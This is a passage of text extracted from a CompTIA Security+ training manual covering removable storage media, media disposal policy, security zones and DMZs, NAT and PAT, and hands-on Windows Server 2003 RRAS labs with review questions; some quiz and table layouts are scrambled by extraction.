drives.

Transmission and storage media

1013

The Iomega Company has created many of the cartridge drives and related media. The first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB disk choices. Over the years they increased the disk capacity up to 230 MB. The disks were Mylar disks (like in a floppy disk), in approximately 5.25 inch sturdy cartridge cases. Zip drives Another popular solution was the Iomega Zip drive. This was slightly larger than a 3.5 floppy disk. The original capacity was 100 MB. Later versions were 250 and 750 MB. The 750 MB drive could read 100 MB cartridges, but not write to them. The 250 MB drive could read and write to 100 MB cartridges, but at a slower speed than to 250 MB cartridges. It was available with parallel, SCSI, and USB interface options. Zip disks are prone to getting dirty and the drives were prone to heads becoming misaligned. This caused problems reading the disks. The head arm would be rapidly snapped into the drive and out again, creating a click. This became known as the click of death. It often tore the edge of the disk and sometimes damaged the head as well. Damaged disks could also damage other drives if the disk was tried in another drive.

Exhibit 10-7: Zip drive and cartridge Jaz drives Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB cartridges that used Winchester hard drive technology. They were available in SCSI and USB interface models. REV drives The current Iomega offering is the 35 GB REV drive. The read/write heads and controller are contained in the drive. They can be connected via USB, SCSI, FireWire, and ATAPI interfaces.

1014 CompTIA Security+ Certification


Imation drives The other major player in the removable cartridge storage solution was Imation, a 3M company. Their product was the SuperDisk. The LS-120 and LS-240 models had 120 MB and 240 MB capacity respectively. These drives can also read standard 1.44 MB floppy disks. The drives were not common. They came out after Iomega Zip drives had already been out for several years. They were slow and prone to reliability problems. People liked them because they could read standard floppy disks. Tape drives There are also numerous magnetic storage technologies such as quarter inch cartridge, digital audio tape (DAT), and digital linear tape (DLT) that are variations on tape drives and can store up to 13 GB of information. These types of media are primarily used to backup large amounts of data.

Optical storage media


Optical storage media uses light and reflection to transmit data. There are different types of optical storage, the most common being the compact disc (CD) as shown in Exhibit 10-8.

Exhibit 10-8: Compact disc A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is recorded onto a CD by creating very small bumps in the aluminum layer on long tiny tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks, an optical reader called an optoelectronic sensor detects the changing pattern of reflected light from the bumps in the aluminum coating. This pattern is then translated into bits and sent to the computer. Although many CDs are produced professionally, it is now possible to make a CD with a personal computer. CD writers, or burners, record the data onto the aluminum coating, creating the bumps that are read by the CD drive. A typical CD can store 700 MB of data, which is approximately the same as 486 standard floppy disks. This means a CD can store over three million pages of text or 20,000 graphic images. CDs are commonly used to store multimedia, such as music or video, which need large amounts of storage space. The most common forms of CDs are those that hold recorded music.

Transmission and storage media CD-ROMs

1015

The most common type of CD used with computers is the CD-ROM. Material can be written or recorded to the disc only once, usually by a professional CD-ROM producing company. CD-ROMs hold prerecorded materials to be used on a computer, such as software, graphic images, short video clips, or audio. When you purchase a new piece of software, it normally comes on a CD-ROM and is installed using the CD-ROM drive. CD-Rs Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive. CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs hold about 700 megabytes of data. They can be used to store older documents or files that you want to save but do not need to access daily. Many people use CD-Rs to distribute files to others and to backup files. Although CD-R discs appear to be identical to other types of CDs, instead of having an aluminum layer on which the data has been prerecorded using bumps, a CD-R has a layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive, the data is burned or recorded on the disc with a high-powered laser beam. Instead of creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color of the light-sensitive dye by pulsing in patterns. CD-Rs can have data recorded onto it only one time. Hence, it is called a write once, read many (WORM) type of media. The next step in CD technology is the compact disc-rewriteable (CD-RW). A CD-RW disk is very similar to a CD-R disk, except that it can be recorded onto more than once. The layer of dye is different and can be rewritten multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive is similar to the CD-R drives, with the additional abilities to record or write over data on the same disc. Both the CD-RW discs and CD-RW drives are more expensive to purchase than CD-R discs and drives. DVDs The DVD is becoming a popular type of permanent optical storage. Primarily used to store full-length feature films, the DVD is similar to a CD, but with a much larger data capacity. A DVD holds about seven times as much data as a regular CD. Like CDs, DVDs are also made out of plastic with a layer of gold, covered by a thin layer of clear polymer. The difference is that the tracks on a DVD are much thinner and placed closer to each other, so many more tracks fit on a disc, allowing more space for recorded data. In addition, DVDs can be recorded on both sides, doubling the amount of storage space available.

Solid-state storage media


Solid-state is a newer type of removable storage media. This technology usually consists of a microchip and has no moving parts, which is why it is called solid-state. Data is recorded directly into the microchip in digital form.

1016 CompTIA Security+ Certification


There are several popular types of solid-state media currently being used, as shown in Exhibit 10-9. Called flash memory, these media are used primarily in digital cameras, digital video cameras, digital audio recorders, PDAs, and camera cell phones. Solidstate media is physically very small, yet can contain up to at least 2 GB of memory.

Exhibit 10-9: Solid-state storage media External flash memory readers can access a flash memory card just as if it were an additional hard drive on a computer. Because the computer considers the files on the memory card already on the computer, using these files is just like using any other file on the computer. Removable solid-state storage media can be used with devices, or drives, that are either internal or external. These devices communicate with the computer through interfaces in the form of cables and connectors that connect the device to the CPU or the motherboard. Because there are no moving parts to break, solid-state media is more reliable and durable than conventional hard disk drives. It requires no battery to retain its data. Many other devices such as wireless phones and personal digital assistants (PDAs) also use solid-state media for storage. There currently are several popular types of solid-state media, including CompactFlash, SmartMedia, memory sticks, and secure digital/multimedia cards. CompactFlash The CompactFlash card is a very small type of storage, measuring only 1.7 inches by 1.4 inches, and less than a 1/4 of an inch thick. It weighs a mere half-ounce. Even with this small size, a CompactFlash card currently can store up to 4 GB of data. Many digital devices cannot handle this large storage size, so a more common storage capacity is between 8 and 128 MB. SmartMedia The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter. Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and newer printing devices. These cards can store only up to 64 MB of data, unlike CompactFlash cards, which can store up to 1 GB. However, SmartMedia cards are less expensive than CompactFlash cards. Like the CompactFlash cards, SmartMedia cards have a high data transfer rate and are resistant to extreme weather conditions.

Transmission and storage media Memory Stick

1017

Another popular type of removable data storage is the Memory Stick. About the size of a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks are commonly used with digital still cameras, digital music players (MP3), digital voice recorders, and other digital devices. It has some of the same features as the CompactFlash card and the SmartMedia card, including a high data transfer rate, resistance to extreme temperatures, and high storage capacity. Secure digital/multimedia cards Secure digital/multimedia cards are primarily used in MP3 players and digital cameras. These SD/MMC memory cards are about the same size as SmartMedia cards, but thicker and have their own controller like CompactFlash cards. These cards can store up to 8 GB.

Flash memory drives


USB flash memory drives can be plugged into any USB port. Files can then be copied to or from the computer or network. This can lead to unwanted files being introduced to the computer or network. It can also result in theft of files from the computer or network. Some of these devices are also bootable which can lead to additional security problems such as the introduction of viruses. In some school and business settings, the ability to use devices such as removable flash drives is disabled. If one of these drives is detected, the drive does not show up. This is to prevent the introduction of viruses on the network. Also, some companies do not allow their use since these small devices can be easily concealed and used to steal information from the business.

Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate the risk of a catastrophic loss of data. The simplest way to do this is to make backup copies of any sensitive information and store the copies in a safe place. Information that is so vital that business operation could be threatened if lost should be stored at a separate, secure location preferably in a fire safe. It is also very important to use a type of media that is less likely to be corrupted or damaged, with solid-state media being the best choice in this instance. Magnetic media is very easily damaged or erased, and optical media is easily scratched and made unreadable.

Encryption
To guarantee that sensitive information does not fall into the wrong hands, any organization should implement a thorough encryption policy. At no time should business-critical information be stored in an unencrypted fashion. All of the media discussed above are compatible with encryption technologies. The key to a successful encryption policy is to educate the entire organization as to the importance of safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised.

1018 CompTIA Security+ Certification Storing and destruction of media


Once data has been transferred to some type of storage media, it is important to have a policy that tracks the content of each disk and where it is located. The medium itself should be well marked with a standardized naming scheme to avoid confusion. As part of the policy, a clear and concise reporting structure should be implemented to account for any missing storage media. All copies should be kept in a secure location until they are no longer needed. Once the data has become obsolete (the timeframe varies by organization), it is necessary to dispose of the media appropriately. This can be done by physically destroying the media, thereby rendering it unreadable, or by merely erasing the data if it is on a medium that is erasable. Note: A crafty hacker need only go through a companys dumpster to likely find all types of data from floppy disks, old tape, even hard disks from servers that are no longer needed or were damaged. Keep in mind that just because a disk drive dies does not mean the data cannot be recovered. A strong policy that ensures the complete destruction of all discarded storage media should be in place and followed. Do it!

B-1:

Discussing storage media

Questions and answers


1 The most common size for floppy disks today is:
A

3.5 inches 5.25 inches 8 inches 12 inches

B C D

2 A(n) ___________ detects the changing pattern of reflected light from the bumps in the aluminum coating on a CD. A
B

magnetic field optoelectronic sensor infrared beam disk texture sensor

C D

3 Smart Media is an example of solid-state storage media. True or false?


True

Transmission and storage media

1019

Unit summary: Transmission and storage media


Topic A In this topic, you learned about the various types of transmission media used in network communications. You examined the advantages and disadvantages of each type and learned how to harden the physical layer of the OSI model to protect against intrusion. In this topic, you learned about the various types of storage media used to store data. You identified the characteristics of each medium. Finally, you learned how to properly store data and, when it is no longer usable, destroy it.

Topic B

Review questions
1 Describe coaxial cable construction.
It is composed of a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield.

2 Fill in the answers below


RG RG-8 RG-58 RG-59 Ohms 50 50 75 Typically used for Ethernet network LAN backbone Ethernet networks Cable TV and cable modems

3 Describe twisted pair cable.


Individual wires are twisted together to prevent cross talk between pairs and to reduce the effects of EMI and RFI.

4 What is the difference between UTP and STP cable?


STP includes an extra foil shield that is wrapped between the copper pairs to provide additional protection from EMI.

5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.

6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable. True or False?
True

7 What are the advantages of using fiber optic cable?


Very high bandwidth, EMI immunity, long distances.

8 List potential damage that can be caused by altering data flows on the network.
Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain network access.

1020 CompTIA Security+ Certification


9 What is war driving?
Using a laptops wireless network interface card set in promiscuous mode to pick up unsecured wireless signals; usually carried out by driving around with a laptop to locate the signals.

10 List the three major types of storage media.


Magnetic, optical, and solid-state.

11 List examples of storage devices that use a metal oxide coating.


Floppy disks, hard drives, cartridge drives, tape drives.

12 List examples of storage media that use light and reflection to transmit data.
CD-ROM, CD-R, CD-RW, and DVD.

13 What is a potential drawback to allowing users to use flash memory drives?


This can lead to unwanted files being introduced to the computer or network. It can also result in theft of files from the computer or network. Some of these devices are also bootable which can lead to additional security problems such as the introduction of viruses.

14 If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised. True or False?
True

15 How should data be disposed of?


By physically destroying the media or erasing the data, depending on the level of security required.

Transmission and storage media

1021

Independent practice activity


An advanced feature of NTFS is the ability to encrypt files and folders. Unlike most encryption programs, NTFS encryption is transparent to the user. This is especially useful for users that are not concerned with learning the details behind the operating system, but who want to create data, encrypt it, and move on. The disadvantage to transparent encryption, however, is that while the users are not bothered by knowing which data is encrypted, they also are not notified about which data is decrypted, opening a potential security hole. After completing this activity, youll be able to encrypt a file on an NTFS partition and remove the encryption by copying the file to a floppy disk. Note: Students should have computers running Windows Server 2003 server with an NTFS partition and a floppy disk inserted into the floppy drive. 1 Using Windows Explorer, navigate to C:\Documents and Settings\Administrator. 2 Right-click the Start Menu folder and choose Properties. 3 Click the Advanced button. 4 Check the Encrypt contents to secure data box. 5 Click OK. 6 Click OK; youll be asked to confirm changes. 7 Verify that the Apply changes to this folder, subfolders and files radio button is selected. 8 Click OK. 9 Right-click Start Menu folder and select Send To, 3 Floppy (A). 10 When prompted about encryption, click Ignore All. 11 Once the files are copied, navigate to the floppy disk drive. 12 Right-click the Start Menu folder and choose Properties. Notice that the Advanced button is no longer available. The files were decrypted.

1022 CompTIA Security+ Certification

111

Unit 11 Network security topologies


Unit time: 120 minutes Complete this unit, and youll know how to:
A Describe security zones and identify their

role in network security.


B Explain the features and configuration of

Network Address Translation (NAT).


C Discuss how tunneling can create a virtual

private network.
D Describe VLANs and explain their

significance as related to network security.

112

CompTIA Security+ Certification

Topic A: Security topologies


This topic covers the following CompTIA Security+ exam objective:
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies Security Zones DMZ (Demilitarized Zone) Intranet Extranet

Elements of network topologies


Explanation Security zones, NAT, tunneling, and VLANs are important elements in creating network topologies to secure data and networked resources. Security zonesincluding demilitarized zones (DMZs), extranets and intranetsare put in place using firewalls and routers on the network edge and permit secure communications between the organization and third parties. Network address translation (NAT) masks the source address contained in an IP packet to thwart attackers. Tunneling encrypts and encapsulates network traffic to build a secured connection over a public network. Virtual local area networks (VLANs), which are deployed using network switches, segment different hosts from each other on the network. Each of these technologies will be examined to provide an understanding of the fundamentals of security topologies.

Security zones
Any network that is connected (directly or indirectly) to your organization, but is not controlled by your organization, represents a risk. To alleviate these risks, security professionals create security zones, which divide the network into areas of similar levels of security (trusted, semi-trusted, and untrusted). You create the security zones by putting all your publicly accessed servers in one zone and restricted-access servers in another, then separating both from an external network like the Internet using firewalls. The three main zones into which networks are commonly divided are the intranet, perimeter network, and extranet.

Intranet
The intranet is the organizations private network; this network is fully controlled by the company and is trusted. The intranet typically contains confidential or proprietary information relevant to the company and, consequently, restricts access to internal employees only. The private internal LAN(s) are protected from other security zones by one or more firewalls, which restrict incoming traffic from both the public and DMZ zones.

Network security topologies

113

As an additional safeguard to prevent intrusion, intranets use private address spaces. These IP addresses are reserved for private use by any internal network and are not routable on the Internet. The following address ranges are reserved: Class A 10.0.0.0 10.255.255.255 Class B Class C 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255

Additional security measures include: Installing anti-virus software Removing unnecessary services from mission-critical servers Auditing the critical systems configurations and resources

DMZ
Demilitarized zones are semi-trusted networks that are owned and controlled by the company, but have a lower level of security than the intranet. (The term comes from the geographic buffer zone that was set up between North Korea and South Korea following the UN police action in the early 1950s.) DMZs are commonly used by companies that want to host their own Internet services, while preventing access to their internal networks. The DMZ is typically a network segment consisting of a combination of firewalls, bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also serves as a buffer zone between the Internet and intranet. Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter network. In Exhibit 11-1, the DMZ zone is isolated by two firewalls, one leading to the Internet, the other to the intranet. This configuration protects the Web server with a firewall that allows access to the HTTP for Web services, but restricts all other protocols. A separate firewall is used to isolate the intranet from all Internet traffic. This implementation of the DMZ is called a screened subnet.

Not all organizations require a DMZ, so explain to students that a DMZ is necessary only if a company wishes to host its own public resources such as Web servers and DNS servers. Many organizations host their Web server and other public servers with a third party, thereby avoiding the necessity of a DMZ.

Exhibit 11-1: Three-tiered security topology

114

CompTIA Security+ Certification In Exhibit 11-2, a single firewall with three network interfaces (three-NIC firewall) provides the separation of the intranet, the DMZ and the external network. A single device protects both the perimeter network and the intranet. This network configuration is not as secure as the Exhibit 11-1: a failure or compromise of the three-NIC firewall can result in the compromise of the perimeter network and intranet simultaneously.

Exhibit 11-2: Security zones created by three-NIC firewall Internet users can access only the hosts on the DMZ. In the event that an outside user penetrates the DMZ hosts security, Web pages or FTP files might be corrupted, but no other company information would be exposed. Filter outgoing traffic Filtering traffic originating from a DMZ impairs an attackers ability to have a vulnerable host communicate to the attackers host. An attacker often has the vulnerable DMZ host initiate commands that open an outgoing connection from the DMZ to the attackers host to receive more commands to run. Blocking this initial outbound connection makes life harder for the attacker. Applying filtering to traffic leaving the DMZ can also keep a compromised host from being used as a traffic-generating agent in distributed denial-of-service attacks. Assuming you know that DMZ hosts should not be initiating outbound traffic, you can trigger an intrusion detection alarm to notify you whenever the rule is engaged. Likewise, because you know what traffic should originate on your hosts, you can construct filters that notify you when someone tries to initiate traffic outside of what is expected. This is a key principal in constructing intrusion detection alarms and can be a highly effective method of notifying you when your host has been compromised. The most basic method of limiting outbound traffic is to construct a firewall rule or router filter that specifically drops traffic initiated from devices on the DMZ network interface to the Internet.

Network security topologies Filter incoming traffic

115

Another good candidate for filtering is the traffic coming in from the DMZ interface of the firewall or router that appears to have a source IP address on a network other than the DMZ network number. This traffic generally represents spoofed traffic that is often associated with denial-of-service attacks. When dropping these types of security-related traffic, the firewall or router should be configured to initiate a log message or rule alert so that a notification of a potential system compromise can be sent to an appropriate administrator. A solid understanding of what kind of network traffic is expected to be generated is essential for this kind of configuration to work. The key is to limit traffic to only authorized access. Remember that several common protocols, such as FTP and DNS, initiate outbound connections. Special consideration should be given to these kinds of protocols. Applying these recommendations can make an attackers job much more difficult and provide an administrator early notification when a host has been compromised.

Extranet
The extranet is an extension of your private network or intranet. It allows you to share your business information or operations with another business, such as a supplier, vendor, partner, or customer. This is often referred to as business-to-business (B2B) communications or networks because one company uses the internal resources and services of another. An extranet requires security and privacy. These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network. Companies can use an extranet to: Exchange large volumes of data using Electronic Data Interchange (EDI). Share product catalogs exclusively with wholesalers or those in the trade. Collaborate with other companies on joint development efforts. Jointly develop and use training programs with other companies. Provide or access services provided by one company to a group of other companies, such as an online banking application managed by one company on behalf of affiliated banks. Share news of common interest exclusively with partner companies.

116
Do it!

CompTIA Security+ Certification

A-1:

Understanding security zones

Questions and answers


1 How do you create a security zone?
Put all your publicly accessed servers in a DMZ zone and restricted-access servers in an intranet zone, then separate both using a firewall. Use an additional firewall or NIC installed on a firewall to isolate the DMZ from the Internet.

2 A demilitarized zone (DMZ) is used by a company that wants to host its own Internet services while preventing access to its private network. True or false?
True

3 The DMZ is the most insecure area of your network infrastructure. What hardware is reserved for this area? (Choose all that apply.)
A B C D

Print servers Firewalls Public Internet servers, such as HTTP, FTP, and Gopher servers Mail servers

4 How are security and confidentiality maintained on an extranet?


These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network.

5 List three rules that the DMZ firewall should include.


Answers may include:

Filter traffic originating from a DMZ. Construct filters that notify you when someone tries to initiate traffic outside of what is
expected. Internet.

Specifically drop traffic initiated from devices on the DMZ network interface to the Filter the traffic coming in from the DMZ interface of the firewall or router that appears to
have a source IP address of a network other than the DMZ network number.

Block all ports except for required services.

Network security topologies

117

Topic B: Network Address Translation


This topic covers the following CompTIA Security+ exam objective:
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies NAT (Network Address Translation)

NAT
Explanation Network Address Translation (NAT) is a service that allows the conversion of internal private (IP) addresses to Internet public addresses. They are not routable and are not directly accessible from the Internet. NAT was originally developed as an interim solution to tackle IPv4 address depletion by allowing globally registered IP addresses to be reused or shared by several hosts. The classic NAT defined by RFC 1631 maps IP addresses from one realm to another. A more recent definition of NAT is found in RFC 3022. NAT serves two main purposes: It provides a type of firewall by hiding internal IP addresses. It enables a company to use more internal IP addresses. Because theyre only used internally, theres no possibility of conflict with IP addresses used by other companies and organizations. Although it can be used to translate between any two address realms, NAT is most often used to map IPs from the private address spaces defined by RFC 191, as shown here:
Class A B C Private Address Range 10.0.0.0 10.255.255.255 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255

These addresses were reserved for use by private networks. Enterprises can freely use these addresses to avoid obtaining registered public addresses. Because private addresses can be reused by other organizations, they are not unique and are nonroutable over a common infrastructure. When communication between a privately addressed host and a public network (such as the Internet) is needed, address translation is required. This is where NAT comes in. NAT routers sit on the border between private and public networks, converting private addresses in each IP packet into legally registered public ones. They also provide transparent packet forwarding between addressing realms. The packet sender and receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly supported by WAN access routers and firewalls situated at the network edge.

118

CompTIA Security+ Certification

Static NAT
NAT works by creating bindings between addresses. In the simplest case, a one-to-one mapping might be defined between public and private addresses. Known as static NAT, this can be accomplished by a straightforward, stateless implementation that transforms only the network part of the address, leaving the host part intact. The payload of the packet must also be considered during the translation process. The IP checksum must, of course, be recalculated. Because TCP checksums are computed from a pseudo-header containing source and destination IP address (attached to the TCP payload), NAT must also regenerate the TCP checksum.

Dynamic NAT
More often, a pool of public IP addresses is shared by an entire private IP subnet in a form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings on the fly by building a NAT table. Connections initiated by private hosts are assigned a public address from a pool. As long as the private host has an outgoing connection, it can be reached by incoming packets sent to this public address. After the connection is terminated (or a timeout is reached), the binding expires, and the address is returned to the pool for reuse. Dynamic NAT is more complex because state must be maintained, and connections must be rejected when the pool is exhausted. However, unlike static NAT, dynamic NAT enables address reuse, reducing the demand for legally registered public addresses. The potential problem with dynamic NAT (or static NAT for that matter) is that it has fewer public addresses than inside hosts. If you have 254 public addresses, for example (a class C network), you might assign 3 or 4 of those to static devices, like Web servers and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your organization has 500 hosts? If more than 250 want to use the Internet at the same time, you will run out of public addresses. The solution? PAT.

Port Address Translation (PAT)


A variation of dynamic NAT, known as Port Address Translation (PAT), might be used to allow many hosts to share a single IP address by multiplexing streams differentiated by TCP/UDP port numbers. For example, suppose private hosts 192.168.0.2 and 192.168.0.3 both send packets from source port 1108. A PAT router might translate these to a single public IP address 206.245.160.1 and two different source ports, say 61001 and 61002. Response traffic received for port 61001 is routed back to 192.168.0.2:1108, while port 61002 traffic is routed back to 192.168.0.3:1108. PAT is commonly implemented on Small Office/Home Office (SOHO) routers to enable shared Internet access for an entire LAN through a single public address. Because PAT maps individual ports, it is not possible to reverse map incoming connections for other ports unless another table is configured. A virtual server table can make a server on a privately addressed DMZ reachable from the Internet via the public address of the PAT router (one server per port). This is really a limited form of static NAT, applied to incoming requests.

Since a port number is 16 bits long, this has the potential for a single IP address to serve as many as 65,536 different hosts.

Network security topologies

119

In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT might be used together. For example, an enterprise might locate public Web servers outside of the firewall on a DMZ, while placing a mail server and clients on the private inside network, behind a NAT firewall. Furthermore, suppose there are applications within the private network that periodically connect to the Internet for long periods. In this case: Web servers can be reached from the Internet without NAT, because they live in public address space. Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the Internet requires incoming translation. Because this server must be continuously accessible through a public address associated with its Domain Name System (DNS) entry, the mail server requires static mapping (either a limited-purpose virtual server table or static NAT). For most clients, public address sharing is usually practical through dynamically acquired addresses (either dynamic NAT with a correctly sized address pool, or PAT). Applications that hold onto dynamically acquired addresses for long periods could exhaust a dynamic NAT address pool and block access by other clients. To prevent this, long-running applications might use PAT because it enables higher concurrency (thousands of port mappings per IP address).

1110 CompTIA Security+ Certification


Do it!

B-1:

Discussing Network Address Translation

Questions and answers


1 What are the primary functions that NAT performs? (Choose all that apply.)
A B

Provides a type of firewall by hiding internal IP addresses. Enables a company to use more internal IP addresses. Because theyre used internally only, theres no possibility of conflict with IP addresses used by other companies and organizations. Allows a company to combine multiple ISDN connections into a single Internet connection. All of the above.

C D

2 In what class is address range 10.0.0.0 10.255.255.255?


A

A B C D

B C D

3 In what class is address range 192.168.0.0 192.168.255.255? A B


C

A B C D

4 Which of the following protocols map private IP addresses to registered IP addresses on a one-to-one basis? A
B

Dynamic NAT Static NAT Firewall NAT Dynamic PAT

C D

5 Which of the following IP address ranges is reserved for private networks? A B C


D

10.0.0.0 through 10.255.255.255 172.16.0.0 through 172.31.255.255 192.168.0.0 through 192.168.255.255 All of the above

Network security topologies Do it!

1111

B-2:

Configuring RRAS with NAT Heres why


Windows Server 2003 Routing and Remote Access (RRAS) includes a service that can perform network address translation (NAT). In this activity, you will configure the Windows Server 2003 RRAS server for NAT. For this activity, you will need a partner. Each partnership should have two Windows Server 2003 servers (one with two NIC adapters installed), a Windows Server 2003 server CD, Internet access and a crossover cable. Note: The server with two NIC cards will be referred to as Server-X; the other as Server-Y. Substitute the correct server names for these names.

Heres how
For this activity, each student requires a partner. Each pair requires two Windows Server 2003 servers, a Windows Server 2003 server CD, Internet access, and a crossover cable. Important: Students should not connect the crossover cable until instructed to do so.

1 Log on as Administrator on Server-X

2 Click Start Choose Control Panel and right-click Network


Connections

Choose Open 3 Right-click the second network interface Choose Properties 4 Double-click Internet
Protocol (TCP/IP) This card is not connected to the classroom network.

5 Verify that Obtain an IP


address automatically is

If it isnt, select Obtain an IP address automatically.

selected Click OK Click OK 6 Right-click the second network interface Choose Rename 7 Enter Internal as the name Press e
In Network Connections.

1112 CompTIA Security+ Certification


8 Right-click the first network interface Rename this card as External 9 Click Start Choose Administrative Tools, Routing and Remote
Access

10 Right-click Server-X 11 Select Configure and Enable


Routing and Remote Access To start the Routing and Remote Access Server Setup Wizard.

12 Click Next 13 Select Network address


translation(NAT)

At the Welcome screen.

Click Next 14 Verify that Use this public


interface to connect to the Internet is selected The External card should be connected to the classroom network and the Internal card should be disconnected for now. If necessary.

Select the External interface in the list of available interfaces 15 Click Next 16 Click Finish 17 Expand Server-X 18 Expand IP Routing 19 Select General 20 Right-click the Internal interface Choose Properties 21 Activate the Configuration tab 22 Select Use the following IP
address

To start the Routing and Remote Access. If necessary (In Routing and Remote Access). If necessary.

Make sure that you only configure the Dedicated interface.

To set static IP addressing on the Internal interface. As the IP address. As the Subnet mask.

Enter 10.10.10.1 Enter 255.0.0.0

Network security topologies 23 Click OK 24 Click OK 25 Close and reopen Routing and
Remote Access To save the changes. To acknowledge the warning message.

1113

(To reopen the MMC console. Click Start, then choose Administrative Tools, Routing and Remote Access.) Under IP Routing. If there are multiple instances of Internal, for this step it doesnt matter which instance you choose.

26 Select NAT/Basic Firewall 27 Right-click Internal

Choose Properties 28 Verify that Private interface


connected to private network is selected

Click OK 29 Right-click the External interface Choose Properties 30 Verify that Public interface
connected to the Internet

is selected Click OK 31 Close Routing and Remote


Access

1114 CompTIA Security+ Certification Configuring a private subnet


Explanation If your network is using DHCP, you need to set static IP addresses for the Internal interface on Server-X and the primary interface on Server-Y. By connecting these two interfaces with a crossover cable, you will create a private subnet. With the NAT server properly configured, you can begin to allow clients to access the Internet.

Do it!

B-3:

Configuring the client for Internet access Heres why


Youll use NAT to configure a client for Internet access. Follow your instructors directions for connecting the cable.

Heres how
a Windows Server 2003 server running RRAS with NAT, a second Windows Server 2003 server to act as a client, Internet access on Server-X, and a crossover cable. Assist students with connecting the crossover cable.

Students will require

1 On Server-Y, disconnect the cable to the classroom network 2 Connect a crossover cable from Server-Y to Server-X 3 Log on to Server-Y as
Administrator

4 Click Start Choose Control Panel and right-click Network


Connections

Choose Open 5 Right-click the network interface Choose Properties 6 Double-click Internet
Protocol (TCP/IP)

7 Select Use the following IP


address

To set static IP addressing.

Enter 10.10.10.2 8 Press t Enter 10.10.10.1 9 Under Use the following


DNS server addresses, enter

As the IP address. (Do not press Enter.) To set the Subnet mask. (As the default gateway.) This is the Internal address for Server-X. As the Preferred DNS server.

the IP address of the training centers DNS server Click OK Click OK

Network security topologies 10 Open Internet Explorer 11 Navigate to your favorite Web site 12 Close Internet Explorer
To access the Internet.

1115

1116 CompTIA Security+ Certification Disabling specific ports


Explanation In some cases, you might want to disable access to specific ports on the NAT server. For example, some companies have had users abuse Internet access by using it for nonjob-related tasks, such as listening to online radio stations. This might seem harmless to the average user, but it can be a nightmare for network engineers. The bandwidth consumption used by the Internet radio stations is very large and can get much worse if they are sending streaming video. Windows Server 2003 with RRAS has the ability to block specific ports to allow network engineers to manage Internet access.

Do it!

B-4:

Filtering outgoing traffic Heres why


To configure NAT output filters and to block Internet access for all users that use NAT.

Heres how
have a Windows Server 2003 server running RRAS and NAT and a second Windows Server 2003 server to act as a client.

Students should

1 On Server-X, click Start Choose Administrative


Tools, Routing and Remote Access

2 Expand IP Routing Select General 3 Right-click the External interface Choose Properties 4 Click Outbound Filters Click New

If necessary.

To open the External Properties dialog box. The General tab is activated by default. To open the Outbound Filters dialog box. To open the Add IP Filter dialog box.

Network security topologies 5 Enter the information shown below


To block all Internet access to port 80.

1117

6 Click OK

To return to the Outbound Filters dialog box. The settings you just entered instruct the router to block all Internet access using the HTTP protocol.

7 Verify that Transmit all


packets except those that meet the criteria below is

selected Click OK twice 8 On Server-Y, launch Internet Explorer and try to access your favorite Web site 9 Close Internet Explorer
Internet Explorer will try to load the page. After a few minutes, youll receive the error message: The page cannot be displayed.

1118 CompTIA Security+ Certification Controlling local FTP access


Explanation FTP is a useful tool for transferring files across the Internet, but it has a major security flaw: it sends usernames and passwords across the LAN in plain text. By using Windows Server 2003 RRAS input and output filters, you can control FTP access without blocking other services. In the following activity, youll block local FTP access but allow Internet FTP access. The reason for doing this is that local FTP traffic is susceptible to sniffing, while most Internet FTP sites use anonymous access, which is not.

Do it!

B-5:

Blocking local FTP access Heres why

Heres how
1 On Server-X, right-click the Internal interface Choose Properties 2 Click Inbound Filters Click New 3 Enter the information shown below

To open the Inbound Filters dialog box.

To block local FTP traffic while still allowing Internet ftp access.

Click OK 4 Verify that Receive all


packets except those that meet the criteria below is

To return to the Inbound Filters dialog box.

selected Click OK 5 Click OK

Network security topologies 6 On Server-Y, click Start Choose Run Enter cmd 7 At the command line, enter ftp
10.10.10.1

1119

To connect to Server-X via ftp. Youll be notified that you are connected to Server-X, but the connection will time out, and youll receive the message: Connection closed by remote host.

8 At the command line, enter the following commands:


ftp open ftp.microsoft.com Enter ftp, and when the ftp prompt is displayed, enter open ftp.microsoft.com. Youll connect successfully and be prompted to log on.

9 Press c + C, then enter quit 10 On Server-X, right-click External interface Choose Properties 11 Click Outbound Filters 12 Click Delete Click OK Click OK 13 Right-click Internal interface Choose Properties 14 Click Inbound Filters 15 Click Delete Click OK Click OK

To exit the ftp site.

To start the process of removing the NAT outbound filters.

To close the Output Filters window. To close the External Properties window. To start the process of removing the NAT inbound filters.

To close the Input Filters window. To close the Internal Properties window.

